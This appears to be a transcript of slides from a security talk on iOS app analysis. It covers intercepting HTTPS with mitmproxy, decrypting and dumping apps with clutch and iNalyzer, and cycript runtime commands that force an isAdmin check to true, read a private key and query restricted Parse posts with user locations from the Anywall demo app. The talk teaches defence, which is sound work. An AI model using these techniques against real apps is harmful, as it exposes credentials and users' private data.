iOS App Security

Transcript

1. iOS App Security. if (user.isAdmin) { // You're doing this

   very wrong. }

2. Hey, I’m Kiran Panesar. k_panesar /kiranpanesar [email protected] We make an

   app building platform over at nativ.com.

3. “iOS is so secure” - Lots of people

4. “iOS is so insecure” - Lots of people

5. None
6. None
7. None

8. Goals

9. To give an introductory insight into security systems, exploits and

   tools available for iOS. Goal #1

10. Goal #2 Walk away with the ability to further secure

    your apps and networks.

11. Read up further. Goal #3

12. What we’ll cover - Network security. - Static analysis. -

    Runtime analysis & manipulation. - Decompilation and reverse engineering. - Walkthrough of an exploit.

13. Network Security Intercepting traffic using mitmproxy

14. Network Security - No API is safe! - Intercept network

    traffic. - Self-sign SSL certificates - Replay attacks, request forgery, etc.

15. Network Security - No API is safe! - Intercept network

    traffic. - Self-sign SSL certificates - Replay attacks, request forgery, etc.

16. “Wait, I don’t see any real data! ”

17. Network Security - Configure your device’s proxy settings. - Install

    the self-signed SSL certificate. - Boom. Intercept any HTTPS call made from the device.

18. Network Security - Configure your device’s proxy settings. - Install

    the self-signed SSL certificate. - Boom. Intercept any HTTPS call made from the device.

19. Static Analysis. Decryption with clutch, analysis with iNalyzer

20. Before we get started…

21. ~ ssh [email protected] Make sure you change your default password…

22. iNalyzer - The ultimate static analysis tool for iOS apps.

    - Dumps headers. - Creates a full set of documentation for an app. - Full class hierarchy, interaction diagrams, string analysis. - Uses Doxygen. - By default it’ll only work with system apps. - Use clutch to decrypt any app.

23. iNalyzer ~ root# clutch Anywall ~ root# mv Anywall.ipa Anywall.zip

    ~ root# unzip Anywall.zip ~ root# iNalyzer5 --direct Anywall.app/ iNalyzer [1/9] Dumping Headers:Done ... iNalyzer [9/9] Patching Headers:Done iNalyzer done, file saved at:/var/root/Documents/ iNalyzer/Anywall-direct.ipa
24. None
25. None
26. None

27. Runtime analysis/manipulation Inject into any application using cycript

28. Cycript ~ root# cycript -p Instagram cy# UIApp.delegate.window.rootViewController #"<IGRootViewController: 0x155cead0>"

    cy# UIApp.delegate.window.rootViewController.view.subviews[0] @[#"<UIImageView: 0x157b2850;, #"<UIButton: 0x165c8f90; frame = (12 512; 296 44);] cy# var logInButton = new Instance(0x165c8f90); cy# welcomeLabel.text = "Hello Mobile Mondays!"

29. Cycript Before

30. Cycript After

31. Who cares?!

32. Cycript ~ root# cycript -p VulnerableApp cy# User.messages[‘isAdmin’] = function()

    { return True; } function() { return True;} cy# [APIManager privateKey]; “2EqecahatHaMUphetRUvaTrus-YesPeopleActuallyDoThis”

33. Introspy - A method tracing tool. - Allows us to

    set up tracers on anything we want. - Hooks into methods, prints out values, and continues. - Doesn’t disturb the execution of the program, it just quietly scrapes all the data.
34. None
35. None

36. Decompilation Generate assembler and Pseudocode with Hopper Disassembler

37. Parse is a MBaaS product by Facebook.

38. Parse is secure if configured correctly.

39. Parse is rarely configured correctly.

40. What we’ll do - Steal a Parse app’s API key/secret

    credentials. - Access restricted user posts.

41. Anywall - An official Parse demo app. - Allows you

    to see messages posted by users within 4000 ft.

42. Step #1 Acquiring the API keys using Hopper.

43. None
44. None
45. None
46. None

47. Step #2 Using iNalyzer and Cycript to access restricted data.

48. None
49. None

50. Loading all posts ~ root# cycript -p Anywall cy# var

    query = [PFQuery queryWithClassName:@"Posts"]; #"<PFQuery: 0x156e43b0>" cy# var objects = [query findObjects]; cy# [objects[0] objectForKey:@"location"][@"latitude"] 22.36REDACTED cy# [objects[0] objectForKey:@"location"][@"longitude"] 114.10REDACTED
51. None

52. Defence - Use PT_DENY_ATTACH to disable debugging tracing. - Obfuscation.

    - Secure programming. - Distractions and false flags. - Disable the app if jailbroken or cracked. - Exit the app if suspicious activity is detected.

53. Where next? DamnVulnerableiOSApp.com/#learn